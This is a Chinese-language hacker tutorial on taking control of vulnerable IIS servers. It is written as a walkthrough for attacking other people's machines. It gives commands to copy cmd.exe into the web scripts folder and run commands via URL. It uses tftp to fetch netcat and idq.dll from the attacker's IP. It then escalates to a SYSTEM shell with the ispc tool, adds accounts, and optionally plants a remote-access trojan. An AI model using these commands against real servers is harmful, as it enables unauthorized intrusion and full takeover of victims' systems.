鸟入侵之用iis远程命令取得系统控制权我爱三国手机版

鸟入侵之用iis远程命令取得系统控制权

作者：永恒国度
标签：黑客
阅读次数：126

用流光扫描到的黑色主机（什么是黑色主机，请参见流光帮助），可以利用iis远程

命令取得系统控制权！
除了流光外，还需要snake的ispc（IIS权限提升工具，还没有的可到我的主页下载）
和tftp32。
用鼠标单击黑色主机－》连接，出现iis远程命令行工具，然后执行如下命令：
copy c:\wint\system32\cmd.exe c:\inetpub\scripts\fuck.exe
此时在浏览器中输入：
http://192.168.0.1/scripts/fuck.exe?/c+dir+c:\
如果返回对方c:\目录！那么就可以搞定了！
接下来可以有如下方法：
1、把nc.exe拷贝上去执行：
http://192.168.0.1/scripts/fuck.exe?/c+tftp -i 你的IP GET nc.exe

c:\\inetpub\\scripts\\nc.exe

http://192.168.0.1/scripts/fuck.exe?/c+c:\inetpub\scripts\nc.exe（执行nc）
此时可以telnet到99，但添加用户的时候很显然权限不够！

2、拷贝冰河服务端上去执行，然后…………

在这里我们不用以上方法。
首先在iis远程命令行中输入
dir c:\idq.dll/s
如果找到文件就
copy c:\……\idq.dll c:\inetpub\scripts
如果没有找到，直接
运行tftp32把idq.dll上传,在浏览器中上传
http://192.168.0.1/scripts/fuck.exe?/c+tftp -i 你的IP GET idq.dll

c:\\inetpub\\scripts\\idq.dll
成功后运行ispc.exe
ispc 192.168.0.1/scripts/idq.dll
接着出现
Start to connect to the server...
We Got It!
Please Press Some <Return> to Enter Shell....

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>
哈哈进来了！@这就可以添加用户了！然后就随便你了！